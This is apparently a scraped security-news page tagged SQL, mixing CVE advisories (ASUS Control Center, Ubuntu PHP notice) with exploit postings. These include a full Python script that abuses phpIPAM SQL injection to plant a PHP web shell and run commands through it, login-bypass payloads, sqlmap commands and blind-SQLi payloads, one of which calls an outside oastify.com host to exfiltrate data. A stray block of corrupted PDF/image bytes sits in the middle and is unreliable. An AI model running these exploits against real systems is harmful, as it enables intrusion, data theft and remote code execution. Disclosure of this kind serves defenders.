The Events Made Easy WordPress plugin before 2.2.81 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection

CVE-2022-1905

The Better Find and Replace WordPress plugin before 1.3.6 does not properly sanitise, validate and escape various parameters before using them in an SQL statement, leading to an SQL Injection

CVE-2022-1472

ASUS Control Center is vulnerable to SQL injection. An authenticated remote attacker with general user privilege can inject SQL command to specific API parameters to acquire database schema or access data.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202203002

CVE ID

CVE-2022-26669

CVSS

8.8 (High)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

影響產品

ASUS Control Center v1.4.2.5

問題描述

ASUS Control Center存有SQL Injection漏洞，遠端攻擊者在取得一般使用者權限後，可利用特定API參數注入SQL指令，取得資料庫結構或資料。

解決方法

Update version to 1.4.3.2

漏洞通報者

Cyku Hong (DEVCORE)

公開日期

2022-04-26

CVE-2022-26669: ASUS Control Center - SQL Injection

phpIPAM version 1.4.5 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-04-10# Exploit Author: Guilherme '@behiNdyk1' Alves# Vendor Homepage: https://phpipam.net/# Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5# Version: 1.4.5# Tested on: Linux Ubuntu 20.04.3 LTS#!/usr/bin/env python3import requestsimport argparsefrom sys import exit, argvfrom termcolor import coloredbanner = """█▀█ █░█ █▀█ █ █▀█ ▄▀█ █▀▄▀█   ▄█ ░ █░█ ░ █▀   █▀ █▀█ █░░ █   ▀█▀ █▀█   █▀█ █▀▀ █▀▀█▀▀ █▀█ █▀▀ █ █▀▀ █▀█ █░▀░█   ░█ ▄ ▀▀█ ▄ ▄█   ▄█ ▀▀█ █▄▄ █   ░█░ █▄█   █▀▄ █▄▄ ██▄█▄▄ █▄█   █▄▄ █▀▀ █░█ █ █▄░█ █▀▄ █▄█ █▀ █▀▀ █▀▀█▄█ ░█░   █▄█ ██▄ █▀█ █ █░▀█ █▄▀ ░█░ ▄█ ██▄ █▄▄\n"""print(banner)parser = argparse.ArgumentParser(usage="./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE")parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True)parser.add_argument("-usr", type=str, help="Username to log in as", required=True)parser.add_argument("-pwd", type=str, help="User's password", required=True)parser.add_argument("-cmd", type=str, help="Command to execute", default="id")parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html")parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?")args = parser.parse_args()url = args.urlusername = args.usrpassword = args.pwdcommand = args.cmdpath = args.path# Validating urlif url.endswith("/"):  url = url[:-1]if not url.startswith("http://") and not url.startswith("https://"):  print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow"))  exit()def login(url, username, password):  """Takes an username and a password and tries to execute a login (IPAM)"""  data = {  "ipamusername": username,  "ipampassword": password  }  print(colored(f"[...] Trying to log in as {username}", "blue"))  r = requests.post(f"{url}/app/login/login_check.php", data=data)  if "Invalid username or password" in r.text:    print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red"))    exit()  else:    print(colored("[+] Login successful!", "green"))    return str(r.cookies['phpipam'])auth_cookie = login(url, username, password)def exploit(url, auth_cookie, path, command):  print(colored("[...] Exploiting", "blue"))  vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php"  data = {  "subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -",  "bgp_id": "1"  }  cookies = {  "phpipam": auth_cookie  }  requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies)  test = requests.get(f"{url}/evil.php")  if test.status_code != 200:    return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "red"))  if "--shell" in argv:    while True:      command = input("Shell> ")      r = requests.get(f"{url}/evil.php?cmd={command}")      print(r.text)  else:    print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green"))    r = requests.get(f"{url}/evil.php?cmd={command}")    print(f"\n\n[+] Output:\n{r.text}")exploit(url, auth_cookie, path, command)

phpIPAM 1.4.5 Remote Code Execution

Old Age Home Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass# Date: 12/06/2022# Exploit Author: twseptian# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip# Version: v1.0# Tested on: Kali Linux# Vulnerable codeline 9 in file "/oahms/admin/login.php"$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");# Steps of reproduce:1. Go to the admin login page http://localhost/oahms/admin/login.php2. sqli payload:  admin' or '1'='1';-- -3. password: password# Proof of ConceptPOST /oahms/admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 71Origin: http://localhostConnection: closeReferer: http://localhost/oahms/admin/login.phpCookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=

Old Age Home Management System 1.0 SQL Injection

Ubuntu Security Notice 5479-1 - Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5479-1  
June 15, 2022

php7.2, php7.4, php8.0, php8.1 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php8.0: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter  
- php7.2: HTML-embedded scripting language interpreter

Details:

Charles Fol discovered that PHP incorrectly handled initializing certain  
arrays when handling the pg_query_params function. A remote attacker could  
use this issue to cause PHP to crash, resulting in a denial of service, or  
possibly execute arbitrary code. (CVE-2022-31625)

Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A  
remote attacker could use this issue to cause PHP to crash, resulting in a  
denial of service, or possibly execute arbitrary code. (CVE-2022-31626)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.1  
  php8.1-cgi                      8.1.2-1ubuntu2.1  
  php8.1-cli                      8.1.2-1ubuntu2.1  
  php8.1-fpm                      8.1.2-1ubuntu2.1  
  php8.1-mysql                    8.1.2-1ubuntu2.1  
  php8.1-pgsql                    8.1.2-1ubuntu2.1

Ubuntu 21.10:  
  libapache2-mod-php8.0           8.0.8-1ubuntu0.4  
  php8.0-cgi                      8.0.8-1ubuntu0.4  
  php8.0-cli                      8.0.8-1ubuntu0.4  
  php8.0-fpm                      8.0.8-1ubuntu0.4  
  php8.0-mysql                    8.0.8-1ubuntu0.4  
  php8.0-pgsql                    8.0.8-1ubuntu0.4

Ubuntu 20.04 LTS:  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.12  
  php7.4-cgi                      7.4.3-4ubuntu2.12  
  php7.4-cli                      7.4.3-4ubuntu2.12  
  php7.4-fpm                      7.4.3-4ubuntu2.12  
  php7.4-mysql                    7.4.3-4ubuntu2.12  
  php7.4-pgsql                    7.4.3-4ubuntu2.12

Ubuntu 18.04 LTS:  
  libapache2-mod-php7.2           7.2.24-0ubuntu0.18.04.12  
  php7.2-cgi                      7.2.24-0ubuntu0.18.04.12  
  php7.2-cli                      7.2.24-0ubuntu0.18.04.12  
  php7.2-fpm                      7.2.24-0ubuntu0.18.04.12  
  php7.2-mysql                    7.2.24-0ubuntu0.18.04.12  
  php7.2-pgsql                    7.2.24-0ubuntu0.18.04.12

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5479-1  
  CVE-2022-31625, CVE-2022-31626

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.1  
  https://launchpad.net/ubuntu/+source/php8.0/8.0.8-1ubuntu0.4  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.12  
  https://launchpad.net/ubuntu/+source/php7.2/7.2.24-0ubuntu0.18.04.12

Ubuntu Security Notice USN-5479-1

An issue was discovered in TitanFTP (aka Titan FTP) NextGen before 1.2.1050. When installing, Microsoft SQL Express 2019 installs by default with an SQL instance running as SYSTEM with BUILTIN\Users as sysadmin, thus enabling unprivileged Windows users to execute commands locally as NT AUTHORITY\SYSTEM, aka NX-I674 (sub-issue 2).

%PDF-1.4 %���� 3 0 obj <> stream ����JFIFxx��ZExifMM\*JQQtQs������C��C��@�"�� ���}!1AQa"q2���#B��R��$3br� %&'()\*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� ���w!1AQaq"2�B���� #3R�br� $4�%�&'()\*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?�1���o?�G����<{��7���

CVE-2022-34006

ChurchCRM version 4.4.5 suffers from a remote SQL injection vulnerability.

    ## Title: ChurchCRM 4.4.5 SQLi session hijacking L2## Author: nu11secur1ty## Date: 05.11.2022## Vendor: https://churchcrm.io/## Software: https://github.com/ChurchCRM/CRM## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325## Description:There is a SQL Injection PWN cookie hijacking session vulnerability - broken authentication sanitary logic, in ChurchCRM 4.4.5 via the 'PersonID' parameter in the WhyCameEditor.php app. The authenticated user can get all information for all users on this system when he hit an active session and use this active session in L2 network or even an external network - domain.Status: Highly Vulnerable[+] Payloads:```mysql---Parameter: PersonID (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE (SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: PersonID=1 AND (SELECT 7116 FROM (SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325)## Proof and Exploit:[href](https://streamable.com/ust7qt)

ChurchCRM 4.4.5 SQL Injection

Virtua Software Cobranca version 12S suffers from a remote SQL injection vulnerability.

    # Exploit Title: Virtua Software Cobranca 12S - SQLi# Shodan Query: http.favicon.hash:876876147# Date: 13/08/2021# Exploit Author: Luca Regne# Vendor Homepage: https://www.virtuasoftware.com.br/# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe# Version: 12S# Tested on: Windows Server 2019# CVE : CVE-2021-37589------------------------------------------------------------------------## Description A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter. ## Request PoC```POST /controller/login.php?acao=autenticar HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 37Connection: closeCookie: origem_selecionado=; PHPSESSID=idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario```This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error. ```POST /controller/login.php?acao=autenticar HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 37Connection: closeCookie: origem_selecionado=; PHPSESSID=idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario```## ExploitSave the request from burp to file ```bashpython3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent```

Virtua Software Cobranca 12S SQL Injection

Warehouse Management System 2022 suffers from a remote SQL injection vulnerability.

    ## Title: Warehouse Management System 2022 ML-SQLi## Author: nu11secur1ty## Date: 06.13.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php-codeigniter-warehouse-management-system-free-source-code## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Warehouse-Management-System## Description:A Multiple SQLi exist in Warehouse Management System 2022 by oretnom23.The attacker can retrieve all information from this system by usingthis vulnerability.Status: TURBO CRITICAL[+] Payloads:```mysql---Parameter: cari (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: cari=(selectload_file('\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\qxv'))OR NOT 4744=4744# IltN&kirim=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: cari=(selectload_file('\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\qxv'))OR (SELECT 9682 FROM(SELECT COUNT(*),CONCAT(0x71627a6a71,(SELECT(ELT(9682=9682,1))),0x717a626a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# mXqR&kirim=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: cari=(selectload_file('\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\qxv'))AND (SELECT 7785 FROM (SELECT(SLEEP(5)))LDxo)# ZbKb&kirim=    Type: UNION query    Title: MySQL UNION query (NULL) - 9 columns    Payload: cari=-5568 UNION ALL SELECTCONCAT(0x71627a6a71,0x4856564e4357704e696c6b4648505a656a744575445967544a494d5075566b5a4d466c7976516869,0x717a626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&kirim=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Warehouse-Management-System)## Proof and Exploit:[href](https://streamable.com/ef58wt)

Tag

#sql